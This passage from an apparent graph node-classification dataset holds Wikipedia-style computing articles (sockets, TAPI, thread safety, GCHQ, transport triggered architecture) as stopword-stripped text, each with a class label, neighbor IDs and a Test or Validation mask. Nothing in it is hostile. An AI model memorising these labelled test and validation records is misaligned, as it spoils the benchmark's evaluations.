since different socket pair tuples udp socket established state since udp connectionless therefore netstat show state udp socket udp server create new child processes every concurrently served client process handles incoming data packets remote clients sequentially socket implies udp sockets identified remote address local address although message associated remote address communicating local remote sockets called socket pairs socket pair described unique 4-tuple consisting source destination ip addresses port numbers i.e local remote socket addresses seen discussion tcp case unique socket pair 4-tuple assigned socket number udp case unique local socket address assigned socket number term socket dates rfc 147 1971 used arpanet today implementations sockets based berkeley sockets 1983 internet winsock 1991 api implementations exist streams-based transport layer interface tli 1983 berkeley sockets also known bsd socket api originated 4.2bsd unix operating system released 1983 api 1989 however could uc berkeley release versions operating system networking library free licensing constraints copyright-protected unix 1987 tli networking application programming interface provided unix system v release 3 svr3 continued release 4 svr4 early implementations written tops-20 mvs vm ibm-dos pcip socket primarily concept used transport layer internet model networking equipment routers switches require implementations transport layer operate link layer level switches internet layer routers however stateful network firewalls network address translators proxy servers keep track active socket pairs also fair queuing layer 3 switching quality service qos support routers packet flows may identified extracting information socket pairs raw sockets typically available network equipment used routing protocols igrp ospf internet control message protocol icmp",
    "neighbors": [
      2304,
      2432,
      6148,
      8965,
      3334,
      7049,
      778,
      11,
      2827,
      2701,
      4490,
      6797,
      7053,
      273,
      1556,
      10005,
      3734,
      11413,
      5402,
      5531,
      6555,
      6813,
      10016,
      9507,
      1444,
      5029,
      6694,
      3751,
      7975,
      8998,
      2476,
      10924,
      2222,
      7855,
      7983,
      7217,
      562,
      1586,
      2739,
      2995,
      8499,
      11698,
      8504,
      3006,
      9151,
      4546,
      8386,
      9538,
      4423,
      2509,
      6993,
      11218,
      9300,
      343,
      6487,
      11101,
      5471,
      5472,
      5222,
      3562,
      8810,
      9834,
      367,
      2804,
      5492,
      8692,
      10486
    ],
    "mask": "Test"
  },
  {
    "node_id": 4590,
    "label": 2,
    "text": "Telephony_Application_Programming_Interface:telephony application programming interface telephony application programming interface tapi microsoft windows api provides computer telephony integration enables pcs running microsoft windows use telephone services different versions tapi available different versions windows tapi allows applications control telephony functions computer telephone network data fax voice calls includes basic functions dialing answering hanging call also supports supplementary functions hold transfer conference call park found pbx isdn telephone systems tapi used primarily control either modems recently control business telephone system pbx handsets controlling pbx handset driver provided manufacturer telephone system manufacturers provide drivers allow control multiple handsets traditionally called third-party control manufacturers provide drivers allow control single handset called first-party control third-party drivers designed allow applications see and/or control multiple extensions time telephone systems permit one third-party connection time first-party drivers designed allow applications monitor and/or control one extension time telephone systems naturally permit many connections simultaneously modem connections nature first-party tapi also used control voice-enabled telephony devices including voice modems dedicated hardware dialogic cards tapi introduced 1993 result joint development microsoft intel first publicly available version tapi version 1.3 released patch top microsoft windows 3.1 version 1.3 drivers 16-bit version 1.3 longer supported although msdn development library cds still contain files patches microsoft windows 95 tapi integrated operating system first version windows 95 tapi 1.4 tapi 1.4 support 32-bit applications tapi standard supports connections individual computers lan connections serving number computers tapi 2.0 introduced windows nt 4.0 version 2.0 first version windows nt platform made significant step forward supporting acd pbx-specific functionality 1997 microsoft released tapi version 2.1 version tapi available downloadable update first version supported microsoft windows 95 windows nt/2000 platforms tapi 3.0 released 1999 together windows 2000 version enables ip telephony voip providing simple generic methods making connections two using h.323 using ip multicast computers also offers ability access media stream msp driver involved connection windows xp included tapi 3.1 tapi 2.2 tapi 3.1 supports microsoft component object model provides set com objects application programmers version uses file terminals allow applications record streaming data file play recorded data back stream usb phone tsp telephony service provider also included allows application control usb phone use streaming endpoint tapi 3.0 tapi 3.1 available operating systems earlier windows 2000 windows xp respectively telephony server application programming interface tsapi similar standard developed novell netware servers tapi uses microsoft canonical address format telephone numbers make phone calls derivative e.123 international notation canonical address text string following format codice_1 area code subaddress name optional latter carry extension number direct inward dialing calling party name used isdn/e1/t1 telecommunication protocols dialing rules used transform canonical phone number dialable calling sequence modem depending user location dialing rules include variable-length dialing area code trunk access international access prefixes well central office access calling card/credit card numbers calling sequence contain dialable numbers digits codice_2 dtmf tones codice_3 formatting characters codice_4 control characters codice_5 correspond dial command hayes command set following control characters defined common misconception tapi 3.0 tapi 3.1 replaces tapi 2.x tapi 2.x earlier versions written c api uses pointers structures consequently tapi 2.x easy access c c++ applications awkward use many programming languages tapi 3.x designed component object model com interface done intent making accessible higher level applications developed vb environments provide easy access com n't deal c-style pointers tapi 3.x slightly different set functionality tapi 2.x addition integrated media control significant addition tapi 3.x n't include functionality tapi 2.x like support phone class one notable issue tapi 3.x lack support managed code .net environment documented microsoft kb article 841712 microsoft currently plans support tapi 3.x directly .net programming languages however mark smith provided managed c++ library called itapi3 2.x wrapper .net developers provide libraries work indirectly tapi enabled pbxs one often overlooked reason application developer might choose tapi 2.x tapi 3.x hardware vendors recommendation even though tapi provides abstract model phone lines telephony applications still heavily impacted specific behavior underlying hardware troubleshooting behavior issues usually requires software hardware vendors collaborate almost 1:1 relationship tapi service provider tsp interface tapi 2.x interface collaboration often easier application designed using tapi 2.x experience tapi 3.x varies significantly hardware vendors windows tapi support almost universal telephony hardware voice modems internal external computer expansion boards dialogic telephony cards notable exception never natively supported tapi avaya communication manager relied solely tsapi interface connectivity many pbx systems provide tapi-compliant modem interfaces tapi compatible pbx solutions include aastra 400/800 aastra mx-one alcatel oxo/oxe avaya bcm ip office cisco call manager ericsson-lg emg80 ipecs ipldk nec-philips is3000 ipc100/500 nec sl1000 sv8100/9100 nitsuko dxe600/328 panasonic kx-tda/tde/ncp kx-ns1000 samsung officeserv unify 3000/4000 openscape office shoretel wildix zyxel x6004/x2002 third party drivers often available telephone systems n't drivers made manufacturers",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      10270,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      8262,
      4174,
      4178,
      3156,
      9813,
      603,
      1121,
      2145,
      7271,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      8355,
      7846,
      10414,
      3250,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      7407,
      10991,
      2804,
      6927,
      8976,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      847,
      10079,
      11616,
      4963,
      2943,
      9609,
      9612,
      8080,
      9114,
      10654,
      8607,
      11170,
      11683,
      6584,
      11196,
      2493,
      7629,
      8161,
      6114,
      9196,
      11247,
      3573,
      10229,
      2045,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 4591,
    "label": 3,
    "text": "Architecture_of_Interoperable_Information_Systems:architecture interoperable information systems architecture interoperable information systems aios reference architecture development interoperable enterprise information systems enterprises public administrations want engage automated business processes organizations systems must able work together i.e need interoperable aios represents generic building plan organizations develop interoperable information systems systematically adjusting extending internal information systems aios described doctoral thesis based results various research projects interoperability independent specific products vendors describes generically different layers views relationships technical means needed efficiently establish interoperable information systems aim combines concepts service-oriented architecture collaborative business business process modelling seen complementary aris well-known architecture internal information systems business processes similar automation processes inside organizations automation cross-organizational business processes important trend endeavor collaborating organizations rather strive loose coupling information systems instead tight integration collaborating information systems able work together retain much independency possible characteristic also called interoperability context collaborating organizations business interoperability i.e capability autonomous organizations execute collaborative business process among information systems systems process information i.e capture transport transform store offer information following conception prevailing information systems research information system comprises hardware software enterprise also related human actors business functions processes well organization structures broad understanding example also embodied zachman framework architecture defined “ fundamental organization system embodied components relationships environment principles governing design evolution ” sinz defines information system architecture building plan information system sense specification documentation components relationships covering relevant viewpoints well constructions rules creation building plan accordingly architecture interoperable information systems defined building plan cross-organizational information system enables organizations execute collaborative business process among following work interoperable information systems conducted european research projects 2010 architecture interoperable information systems aios published reference construction loosely coupled interoperating information systems systematic model-based enactment collaborative business processes aios aims primarily large organizations want interoperate aim describes internal information system elements systematically connected information systems collaboration partners main elements aios one element comprised third category bii-repository organization publishes content business interoperability interface bii collaboration partners since comprises external views information system elements provides publishing discovery functionalities needed service-oriented architecture bii externally relevant processes services organization structures etc described various levels technical granularity enabling organizations search also business-level elements technical artifacts different traditional soa approach instead one central service directory various partner-specific repositories implemented static part architecture builds three orthogonal axes enterprise dimensions levels technical granularity colloborative views similar private public global views known business process workflow modeling aios corresponding private public global views information system elements provided describe business processes comprehensively axis provides distinct views processes functions data organizational elements thus combination axis collaborative views private public global views processes functions data organizational roles provided description system elements different levels technical granularity supports systematic development collaborative information systems starting business requirements definition going way code level apart construction aspect thereby also multi-dimensional interoperability description provided facilitating synchronization collaborating systems level similar example aris omg mda three levels used",
    "neighbors": [
      4107,
      2948,
      8581,
      11367
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4592,
    "label": 9,
    "text": "Thread_safety:thread safety thread safety computer programming concept applicable multi-threaded code thread-safe code manipulates shared data structures manner ensures threads behave properly fulfill design specifications without unintended interaction various strategies making thread-safe data structures program may execute code several threads simultaneously shared address space threads access virtually memory every thread thread safety property allows code run multithreaded environments re-establishing correspondences actual flow control text program means synchronization software libraries provide certain thread-safety guarantees example concurrent reads might guaranteed thread-safe concurrent writes might whether program using library thread-safe depends whether uses library manner consistent guarantees different vendors use slightly different terminology thread-safety thread safety guarantees usually also include design steps prevent limit risk different forms deadlocks well optimizations maximize concurrent performance however deadlock-free guarantees always given since deadlocks caused callbacks violation architectural layering independent library discuss two approaches avoiding race conditions achieve thread safety first class approaches focuses avoiding shared state includes second class approaches synchronization-related used situations shared state avoided following piece java code method thread-safe class counter c programming language thread stack however static variable kept stack threads share simultaneous access multiple threads overlap running function possible static variable might changed one thread another midway checking difficult-to-diagnose logic error may compile run properly time called race condition one common way avoid use another shared variable lock mutex mutual exclusion following piece c code function thread-safe reentrant int increment_counter codice_1 called different threads without problem since mutex used synchronize access shared codice_2 variable function used reentrant interrupt handler second interrupt arises mutex locked second routine hang forever interrupt servicing disable interrupts whole system could suffer function implemented thread-safe reentrant using lock-free atomics c++11 int increment_counter",
    "neighbors": [
      1152,
      9224,
      1801,
      3990,
      7446,
      5154,
      5031,
      6184,
      10791,
      5677,
      5040,
      10033,
      4680,
      335,
      4823,
      5598,
      2804,
      2045,
      6527
    ],
    "mask": "Test"
  },
  {
    "node_id": 4593,
    "label": 8,
    "text": "Celtix:celtix celtix java enterprise service bus esb runtime set apis make easy add transports message formats security features goal simplify construction integration flexible reuse technical business components using standards-based service-oriented architecture celtix code base merged codehaus xfire form apache cxf project",
    "neighbors": [
      8425,
      4107,
      5677,
      1851,
      7261
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4594,
    "label": 5,
    "text": "Pair_gain:pair gain telephony pair gain transmitting multiple pots signals twisted pairs traditionally used single traditional subscriber line telephone systems pair gain effect creating additional subscriber lines typically used expedient way solve subscriber line shortage problems using existing wiring instead installing new wires central office customer premises term invented middle 20th century analogy earlier use gain extend telephone local loops far telephone exchange pair gain system consists concentrators multiplexers combine separate signals single signal transmitted existing copper cable pair signals separated individual subscriber lines customer premises pair gain unit performs multiplexing simply provide second telephone connection single subscriber line called analog multi-line carrier aml circumstances customer wants add new phone line fax machine dial-up internet connection larger analog pair gain system made anaconda 1960s provided seven lines pair gain units expand number subscriber lines available single copper pair many sixty large pair gain units stored serving area interfaces metal cabinets typically resembling small apartment-sized refrigerators alongside near roadways overlie communications rights-of-way dacs digital access carrier system form pair gain used united kingdom uses form time division multiple access called isdn analog pair gain came disfavor 21st century detrimental high speed dial-up modem connections support 56k incompatible digital subscriber line dsl systems 20th century subscriber loop carrier systems similar problems recent digital pair gain systems however restore 56k dsl capabilities performing functions dslam pair gain device recently term pair gain used refer multiplex/demultiplex unit used central office end users equipment used copper twisted pair digital loop carrier called remote integrated multiplexer australia installed broadband internet subscribers may disappointed informed although initial line checks successful high speed connections adsl unavailable due infrastructure issues problem pair gain lines carry high speed data",
    "neighbors": [
      11181,
      1967
    ],
    "mask": "Test"
  },
  {
    "node_id": 4595,
    "label": 4,
    "text": "Government_Communications_Headquarters:government communications headquarters government communications headquarters gchq intelligence security organisation responsible providing signals intelligence sigint information assurance government armed forces united kingdom based doughnut suburbs cheltenham gchq responsibility country secretary state foreign commonwealth affairs part foreign office director ranks permanent secretary gchq originally established first world war government code cypher school gc cs known name 1946 second world war located bletchley park responsible breaking german enigma codes two main components gchq composite signals organisation cso responsible gathering information national cyber security centre ncsc responsible securing uk communications joint technical language service jtls small department cross-government resource responsible mainly technical language support translation interpreting services across government departments co-located gchq administrative purposes 2013 gchq received considerable media attention former national security agency contractor edward snowden revealed agency process collecting online telephone data uk via tempora programme snowden revelations began spate ongoing disclosures global surveillance guardian newspaper forced destroy incriminating files given snowden threats lawsuits uk government gchq led director gchq jeremy fleming corporate board made executive non-executive directors reporting corporate board first world war british army royal navy separate signals intelligence agencies mi1b nid25 initially known room 40 respectively 1919 cabinet secret service committee chaired lord curzon recommended peacetime codebreaking agency created task given director naval intelligence hugh sinclair sinclair merged staff nid25 mi1b new organisation initially consisted around 25–30 officers similar number clerical staff titled government code cypher school cover-name chosen victor forbes foreign office alastair denniston member nid25 appointed operational head initially control admiralty located watergate house adelphi london public function advise security codes cyphers used government departments assist provision also secret directive study methods cypher communications used foreign powers gc cs officially formed 1 november 1919 produced first decrypt prior date 19 october second world war gc cs relatively small department 1922 main focus gc cs diplomatic traffic service traffic ever worth circulating initiative lord curzon transferred admiralty foreign office gc cs came supervision hugh sinclair 1923 chief sis director gc cs 1925 organisations co-located different floors broadway buildings opposite st. james park messages decrypted gc cs distributed blue-jacketed files became known bjs 1920s gc cs successfully reading soviet union diplomatic ciphers however may 1927 row clandestine soviet support general strike distribution subversive propaganda prime minister stanley baldwin made details decrypts public second world war gc cs based largely bletchley park present-day milton keynes working understanding german enigma machine lorenz ciphers 1940 gc cs working diplomatic codes ciphers 26 countries tackling 150 diplomatic cryptosystems senior staff included alastair denniston oliver strachey dilly knox john tiltman edward travis ernst fetterlein josh cooper donald michie alan turing gordon welchman joan clarke max newman william tutte i. j jack good peter calvocoressi hugh foss outstation far east far east combined bureau set hong kong 1935 moved singapore 1939 subsequently japanese advance malay peninsula army raf codebreakers went wireless experimental centre delhi india navy codebreakers fecb went colombo ceylon kilindini near mombasa kenya gc cs renamed government communications headquarters june 1946 gchq first based eastcote 1951 moved outskirts cheltenham setting two sites – oakley benhall duncan campbell mark hosenball revealed existence gchq 1976 article time result hosenball deported uk gchq low profile media 1983 trial geoffrey prime kgb mole within gchq created considerable media interest since days second world war us british intelligence shared information gchq means shares information gets information national security agency nsa united states 1984 gchq centre political row conservative government margaret thatcher prohibited employees belonging trade union claimed joining union would conflict national security number mass national one-day strikes held protest decision seen first step wider bans trade unions appeals british courts european commission human rights unsuccessful government offered sum money employee agreed give union membership appeal ilo resulted decision government actions violation freedom association protection right organise convention ban eventually lifted incoming labour government 1997 government communications group public commercial services union pcs formed represent interested employees grades 2000 group 14 former gchq employees dismissed refusing give union membership offered re-employment three accepted intelligence services act 1994 placed activities intelligence agencies legal footing first time defining purpose british parliament intelligence security committee given remit examine expenditure administration policy three intelligence agencies objectives gchq defined working interests national security particular reference defence foreign policies majesty government interests economic wellbeing united kingdom support prevention detection serious crime introduction intelligence agency act late 1993 former prime minister jim callaghan described gchq full blown bureaucracy adding future bodies created provide oversight intelligence agencies investigate whether functions gchq carries today still necessary 1993 wake squidgygate affair gchq denied intercepting recording disclosing telephone calls british royal family late 1993 civil servant michael quinlan advised deep review work gchq following conclusion review intelligence requirements resources imposed 3 cut agency chief secretary treasury jonathan aitken subsequently held face face discussions intelligence agency directors assess savings wake quinlan review aldrich 2010 suggests sir john adye director gchq performed badly meetings aitken leading aitken conclude gchq suffering out-of-date methods management out-of-date methods assessing priorities gchq budget £850 million 1993 £ compared £125 million security service sis mi5 mi6 december 1994 businessman roger hurn commissioned begin review gchq concluded march 1995 hurn report recommended cut £100 million gchq budget large reduction suffered british intelligence agency since end world war ii j division gchq collected sigint russia disappeared result cuts cuts mostly reversed 2000 wake threats violent non-state actors risks increased terrorism organised crime illegal access nuclear chemical biological weapons david omand became director gchq 1996 greatly restructured agency face new changing targets rapid technological change omand introduced concept sinews sigint new systems allowed flexible working methods avoiding overlaps work creating fourteen domains well-defined working scope tenure omand also saw planning creation doughnut gchq modern headquarters located 176-acre site benhall near cheltenham doughnut would largest building constructed secret intelligence operations outside united states operations gchq chum hom kwok listening station hong kong ended 1994 gchq hong kong operations extremely important relationship nsa contributed investment equipment station anticipation transfer hong kong chinese government 1997 hong kong stations operations moved geraldton australia operations used gchq intelligence-gathering capabilities 1990s included monitoring communications iraqi soldiers gulf war dissident republican terrorists real ira various factions involved yugoslav wars criminal kenneth noye mid 1990s gchq began assist investigation cybercrime end 2003 gchq moved new circular hq popularly known doughnut time second-largest public-sector building project europe estimated cost £337 million new building designed gensler constructed carillion became base gchq cheltenham operations public spotlight fell gchq late 2003 early 2004 following sacking katharine gun leaked observer confidential email agents united states national security agency addressed gchq agents wiretapping un delegates run-up 2003 iraq war gchq gains intelligence monitoring wide variety communications electronic signals number stations established uk overseas listening stations cheltenham bude scarborough ascension island united states menwith hill ayios nikolaos station cyprus run british army gchq march 2010 gchq criticised intelligence security committee problems security practices failing meet targets work targeted cyber attacks revealed edward snowden guardian gchq spied foreign politicians visiting 2009 g-20 london summit eavesdropping phonecalls emails monitoring computers cases even ongoing summit via keyloggers installed summit according edward snowden gchq two principal umbrella programs collecting communications gchq also access us internet monitoring programme prism since least june 2010 prism said give national security agency fbi easy access systems nine world top internet companies including google facebook microsoft apple yahoo skype february 2014 guardian based documents provided snowden revealed gchq indiscriminately collected 1.8 million private yahoo webcam images users across world month nbc intercept based documents released snowden revealed joint threat research intelligence group cne units within gchq mission cyber operations based dirty tricks shut enemy communications discredit plant misinformation enemies operations 5 gchq operations according conference slideshow presented gchq soon becoming director gchq 2014 robert hannigan wrote article financial times topic internet surveillance stating however much large us technology companies may dislike become command control networks choice terrorists criminals gchq sister agencies tackle challenges scale without greater support private sector arguing internet users would comfortable better sustainable relationship intelligence agencies tech companies since 2013 global surveillance disclosures large us technology companies improved security become less co-operative foreign intelligence agencies including uk generally requiring us court order disclosing data however head uk technology industry group techuk rejected claims stating understood issues disclosure obligations must based upon clear transparent legal framework effective oversight rather suggested deal industry government 2015 documents obtained intercept us national security agency whistleblower edward snowden revealed gchq carried mass-surveillance operation codenamed karma police since 2008 karma police operation swept ip address internet users visiting websites program established public scrutiny oversight karma police powerful spying tool conjunction gchq programs ip addresses could cross-referenced data goal program according documents either web browsing profile every visible user internet b user profile every visible website internet 2015 gchq admitted first time court conducts computer hacking 2017 us press secretary sean spicer alleged gchq conducted surveillance us president donald trump basing allegation statements made media commentator fox news segment us government formally apologised allegations promised would repeated however surveillance russian agents pick contacts made trump campaign team run election passed us agencies 31 october 2018 gchq joined instagram well mission gather intelligence gchq long-time corresponding mission assist protection british government communications government code cypher school gc cs created 1919 overt task providing security advice gc cs security section located mansfield college oxford second world war april 1946 gc cs became gchq gchq security section moved oxford join rest organisation eastcote later year 1952 1954 intelligence mission gchq relocated cheltenham security section remained eastcote march 1954 became separate independent organisation london communications security agency lcsa 1958 renamed london communications-electronic security agency lcesa april 1965 gpo mod units merged lcesa become communications-electronic security department cesd october 1969 cesd merged gchq becoming communications-electronic security group cesg 1977 cesg relocated eastcote cheltenham cesg continued uk national technical authority information assurance including cryptography cesg manufacture security equipment worked industry ensure availability suitable products services gchq funded research areas example centre quantum computing oxford university heilbronn institute university bristol 21st century cesg ran number assurance schemes check clas commercial product assurance cpa cesg assisted products service caps late 1969 concept public key encryption developed proven james h. ellis worked cesg cesd since 1965 ellis lacked necessary number theory expertise necessary build workable system subsequently feasible implementation scheme via asymmetric key algorithm invented another staff member clifford cocks mathematics graduate fact kept secret 1997 2016 national cyber security centre established gchq located london uk authority cyber security absorbed replaced cesg well activities previously existed outside gchq centre cyber assessment cca computer emergency response team uk cert uk cyber-related responsibilities centre protection national infrastructure cpni joint technical language service jtls established 1955 drawing members small ministry defence technical language team others initially provide standard english translations organisational expressions foreign language discover correct english equivalents technical terms foreign languages discover correct expansions abbreviations language remit jtls expanded ensuing years cover technical language support interpreting translation services across uk government local public sector services gloucestershire surrounding counties jtls also produces publishes foreign language working aids crown copyright conducts research machine translation on-line dictionaries glossaries jtls co-located gchq administrative purposes gchq operates partnership equivalent agencies worldwide number bi-lateral multi-lateral relationships principal united states national security agency canada communications security establishment australia australian signals directorate new zealand government communications security bureau mechanism uk-us security agreement broad intelligence-sharing agreement encompassing range intelligence collection methods relationships alleged include shared collection methods system described popular media echelon well analysed product gchq legal basis enshrined intelligence services act 1994 section 3 follows activities involve interception communications permitted regulation investigatory powers act 2000 kind interception carried warrant issued secretary state human rights act 1998 requires intelligence agencies including gchq respect citizens rights described european convention human rights prime minister nominates cross-party members parliament intelligence security committee remit committee includes oversight intelligence security activities reports made directly parliament functions increased justice security act 2013 provide access investigatory powers judicial oversight gchq conduct exercised investigatory powers tribunal uk also independent intelligence services commissioner interception communications commissioner former senior judges investigatory powers tribunal ruled december 2014 gchq breach european convention human rights activities compliant articles 8 right privacy 10 freedom expression european convention human rights however tribunal stated february 2015 one particular aspect data-sharing arrangement allowed uk intelligence services request data us surveillance programmes prism upstream contravention human rights law prior two paragraphs additional information providing details procedures safeguards disclosed public december 2014 furthermore ipt ruled legislative framework united kingdom permit mass surveillance gchq collects analyses data bulk practice mass surveillance complements independent reports interception communications commissioner special report made intelligence security committee parliament although several shortcomings potential improvements oversight legislative framework highlighted despite inherent secrecy around much gchq work investigations carried uk government snowden disclosures admitted various abuses security services report intelligence security committee isc 2015 revealed small number staff uk intelligence agencies found misuse surveillance powers one case leading dismissal member staff gchq although laws place time make abuses criminal offence later year ruling investigatory powers tribunal found gchq acted unlawfully conducting surveillance two human rights organisations closed hearing found government breach internal surveillance policies accessing retaining communications egyptian initiative personal rights legal resources centre south africa second time ipt history made positive determination favour applicants closed session another ipt case 2015 gchq conceded january 2010 regime interception/obtaining analysis use disclosure destruction legally privileged material accordance law purposes article 8 2 european convention human rights accordingly unlawful admission made connection case brought abdel hakim belhaj libyan opponent former gaddafi regime wife fatima bouchar couple accused british ministers officials participating unlawful abduction kidnapping removal libya march 2004 gaddafi still power 2015 complaint green party mp caroline lucas british intelligence services including gchq spying mps allegedly defiance laws prohibiting gchq introduced policy march 2015 require approval prime minister minister deliberately targeting communications parliamentarian then-home secretary theresa may told parliament 2014 investigatory powers tribunal investigated complaint ruled contrary allegation law gave communications parliament special protection wilson doctrine merely acts political convention controversial gchq case determined scope judicial review prerogative powers crown residual powers common law council civil service unions v minister civil service 1985 ac 374 often known simply gchq case case prerogative order council used prime minister minister civil service ban trade union activities civil servants working gchq order issued without consultation house lords decide whether reviewable judicial review held executive action immune judicial review simply uses powers derived common law rather statute thus prerogative reviewable following list heads operational heads gchq gc cs following stations former stations operated since cold war stations former stations gchq certified training gct scheme established certify two main levels cyber security training also degree masters level courses gct scheme designed help organisations find right training also met gchq exacting standards designed assure high quality cyber security training courses training provider also undergone rigorous quality checks gct process carried apmg independent certification body scheme part national cyber security programme established government develop knowledge skills capability aspects cyber security based iisp skills framework historical drama film imitation game 2014 featured benedict cumberbatch portraying alan turing efforts break enigma code employed government code cypher school gchq set number cryptic online challenges public used attract interest recruitment starting late 1999 response 2004 challenge described excellent challenge set 2015 600,000 attempts also published gchq puzzle book 2016 sold 300,000 copies proceeds going charity second book published october 2018 gchq units gchq specifics uk agencies elsewhere",
    "neighbors": [
      9732,
      10116,
      1930,
      3594,
      1169,
      8978,
      9233,
      1941,
      4118,
      8726,
      9502,
      7199,
      2208,
      8356,
      2213,
      11172,
      3495,
      8104,
      8744,
      2219,
      7979,
      8750,
      5423,
      691,
      10935,
      7416,
      6344,
      4937,
      6985,
      10697,
      7887,
      208,
      11089,
      8274,
      2005,
      7893,
      10709,
      8664,
      9688,
      8156,
      10207,
      8674,
      357,
      5870,
      4595,
      8564,
      8567,
      6648
    ],
    "mask": "Test"
  },
  {
    "node_id": 4596,
    "label": 3,
    "text": "Transport_triggered_architecture:transport triggered architecture computer architecture transport triggered architecture tta kind processor design programs directly control internal transport buses processor computation happens side effect data transports writing data triggering port functional unit triggers functional unit start computation similar happens systolic array due modular structure tta ideal processor template application-specific instruction-set processors asip customized datapath without inflexibility design cost fixed function hardware accelerators typically transport triggered processor multiple transport buses multiple functional units connected buses provides opportunities instruction level parallelism parallelism statically defined programmer respect obviously due large instruction word width tta architecture resembles long instruction word vliw architecture tta instruction word composed multiple slots one slot per bus slot determines data transport takes place corresponding bus fine-grained control allows optimizations possible conventional processor example software transfer data directly functional units without using registers transport triggering exposes microarchitectural details normally hidden programmers greatly simplifies control logic processor many decisions normally done run time fixed compile time however also means binary compiled one tta processor run another one without recompilation even small difference architecture two binary incompatibility problem addition complexity implementing full context switch makes ttas suitable embedded systems general purpose computing one instruction set computer architectures tta architecture one processors based built one processors based sold commercially ttas seen exposed datapath vliw architectures vliw programmed using operations tta splits operation execution multiple move operations low level programming model enables several benefits comparison standard vliw example tta architecture provide parallelism simpler register files vliw programmer control timing operand result data transports complexity number input output ports register file rf need scaled according worst case issue/completion scenario multiple parallel instructions important unique software optimization enabled transport programming called software bypassing case software bypassing programmer bypasses register file write back moving data directly next functional unit operand ports optimization applied aggressively original move transports result register file eliminated completely thus reducing register file port pressure freeing general purpose register temporary variables reduced register pressure addition simplifying required complexity rf hardware lead significant cpu energy savings important benefit especially mobile embedded systems tta processors built independent function units register files connected transport buses sockets function unit implements one operations implement functionality ranging simple addition integers complex arbitrary user-defined application-specific computation operands operations transferred function unit ports function unit may independent pipeline case function unit fully pipelined new operation takes multiple clock cycles finish started every clock cycle hand pipeline always accept new operation start requests old one still executing data memory access communication outside processor handled using special function units function units implement memory accessing operations connect memory module often called load/store units control unit special case function units controls execution programs control unit access instruction memory order fetch instructions executed order allow executed programs transfer execution jump arbitrary position executed program control unit provides control flow operations control unit usually instruction pipeline consists stages fetching decoding executing program instructions register files contain general purpose registers used store variables programs like function units also register files input output ports number read write ports capability able read write multiple registers clock cycle vary register file interconnect architecture consists transport buses connected function unit ports means sockets due expense connectivity usual reduce number connections units function units register files tta said fully connected case path unit output port every unit input ports sockets provide means programming tta processors allowing select bus-to-port connections socket enabled time instant thus data transports taking place clock cycle programmed defining source destination socket/port connection enabled bus tta implementations support conditional execution conditional execution implemented aid guards data transport conditionalized guard connected register often 1-bit conditional register bus case value guarded register evaluates false zero data transport programmed bus guard connected squashed written destination unconditional data transports connected guard always executed processors including tta processors include control flow instructions alter program counter used implement subroutines if-then-else for-loop etc assembly language tta processors typically includes control flow instructions unconditional branches jump conditional relative branches bnz subroutine call call conditional return retnz etc look corresponding assembly language instructions processors like operations tta machine instructions implemented move instructions special function unit tta implementations support conditional execution sttack first move prototype implement control flow instructions conditional move program counter tta implementations support unconditional data transports maxq typically special function unit tightly connected program counter responds variety destination addresses address used destination move different effect program counter—each relative branch condition instruction different destination address condition destination addresses used call retnz etc traditional processor architectures processor usually programmed defining executed operations operands example addition instruction risc architecture could look like following example operation adds values general-purpose registers r1 r2 stores result register r3 coarsely execution instruction processor probably results translating instruction control signals control interconnection network connections function units interconnection network used transfer current values registers r1 r2 function unit capable executing add operation often called alu arithmetic-logic unit finally control signal selects triggers addition operation alu result transferred back register r3 tta programs define operations data transports needed write read operand values operation triggered writing data triggering operand operation thus operation executed side effect triggering data transport therefore executing addition operation tta requires three data transport definitions also called moves move defines endpoints data transport taking place transport bus instance move state data transport function unit f port 1 register file r register index 2 take place bus b1 case multiple buses target processor bus utilized parallel clock cycle thus possible exploit data transport level parallelism scheduling several data transports instruction addition operation executed tta processor follows second move write second operand function unit called alu triggers addition operation makes result addition available output port 'result execution latency 'add ports associated alu may act accumulator allowing creation macro instructions abstract away underlying tta leading philosophy ttas move complexity hardware software due several additional hazards introduced programmer one delay slots programmer visible operation latency function units timing completely responsibility programmer programmer schedule instructions result neither read early late hardware detection lock processor case result read early consider example architecture operation add latency 1 operation mul latency 3 triggering add operation possible read result next instruction next clock cycle case mul one wait two instructions result read result ready 3rd instruction triggering instruction reading result early results reading result previously triggered operation case operation triggered previously function unit read value undefined hand result must read early enough make sure next operation result overwrite yet unread result output port due abundance programmer-visible processor context practically includes addition register file contents also function unit pipeline register contents and/or function unit input output ports context saves required external interrupt support become complex expensive implement tta processor therefore interrupts usually supported tta processors task delegated external hardware e.g. i/o processor need avoided using alternative synchronization/communication mechanism polling",
    "neighbors": [
      1029,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2838,
      10013,
      2339,
      6950,
      3882,
      9003,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      4036,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4597,
    "label": 4,
